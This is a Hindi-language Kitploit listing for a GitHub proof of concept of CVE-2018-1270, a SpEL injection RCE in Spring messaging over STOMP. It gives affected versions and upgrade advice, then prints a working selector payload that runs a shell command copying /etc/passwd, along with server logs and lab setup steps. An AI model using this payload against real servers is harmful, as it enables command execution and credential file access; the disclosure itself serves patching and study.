Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-1270 — Spring messaging STOMP प्रोटोकॉल RCE | Kitploit
उपकरण/GitHubGitHub/caledoniaproject/cve-2018-1270
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षाArchived
GitHubcaledoniaproject/cve-2018-1270

CVE-2018-1270

Spring messaging STOMP प्रोटोकॉल RCE

रिपॉजिटरी देखें
113188 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-1270 - Spring messaging Spel कोड निष्पादन भेद्यता

कल Spring ने एक RCE भेद्यता की घोषणा की, आइए जानें:

  • CVE-2018-1270: Remote Code Execution with spring-messaging

प्रभावित संस्करण

  • Spring Framework 5.0 to 5.0.4
  • Spring Framework 4.3 to 4.3.14

इस भेद्यता के लिए किसी पर्यावरण की आवश्यकता नहीं है, यदि आप spring-messaging + websocket + STOMP का उपयोग कर रहे हैं, तो कृपया जल्द से जल्द नवीनतम संस्करण में अपग्रेड करें; यदि आप SpringBoot का उपयोग कर रहे हैं, तो 2.0.1.RELEASE में अपग्रेड करें।

भेद्यता विवरण

सीधे शब्दों में कहें, StandardEvaluationContext की बहुत अधिक अनुमतियों के कारण, कोई भी SpEL अभिव्यक्ति निष्पादित की जा सकती है, इसलिए आधिकारिक तौर पर Spring 5.0.5 के बाद SimpleEvaluationContext जोड़ा गया, जिसका उपयोग सरल डेटा बाइंडिंग के लिए किया जाता है, लचीलापन बनाए रखता है लेकिन सुरक्षा जोखिम नहीं लाता।

spring-messaging STOMP प्रोटोकॉल समर्थन प्रदान करता है, जो क्लाइंट को संदेशों की सदस्यता लेने और संदेशों को फ़िल्टर करने के लिए selector का उपयोग करने की अनुमति देता है, उदाहरण के लिए

root@kitploit:~
selector = 'T(java.lang.Runtime).getRuntime().exec("cp /etc/passwd /tmp")'
stompClient = Stomp.client('ws://localhost:8080/hello')
stompClient.connect({}, function(frame) {
    stompClient.subscribe('/topic/greetings', function() {}, {
        "selector": selector
    })
});

जब आप सदस्यता लेते हैं, तो spring इस फ़िल्टर को संग्रहीत करता है और जब क्लाइंट को संदेश प्राप्त होता है तो इसे ट्रिगर करता है, उदाहरण के लिए

root@kitploit:~
2018-04-07 08:32:20 [clientInboundChannel-3] TRACE o.s.m.s.b.DefaultSubscriptionRegistry - Subscription selector: [T(java.lang.Runtime).getRuntime().exec("cp /etc/passwd /tmp")]

...

2018-04-07 08:32:21 [MessageBroker-2] DEBUG o.s.m.s.b.DefaultSubscriptionRegistry - Failed to evaluate selector: EL1001E: Type conversion problem, cannot convert from java.lang.UNIXProcess to boolean

Poc स्क्रीनशॉट

screenshot

विस्तृत भेद्यता विश्लेषण लेख बाद में प्रकाशित किया जाएगा

पर्यावरण उपयोग विधि

Spring Boot सर्वर को संकलित और प्रारंभ करें,

root@kitploit:~
mvn clean package
java -jar target/spring-boot-websocket-1.0.jar

पहुँचें - परीक्षण के लिए एक्सप्रेशन दर्ज करें,

root@kitploit:~
http://localhost:8080

screenshot

टूल डाउनलोड करें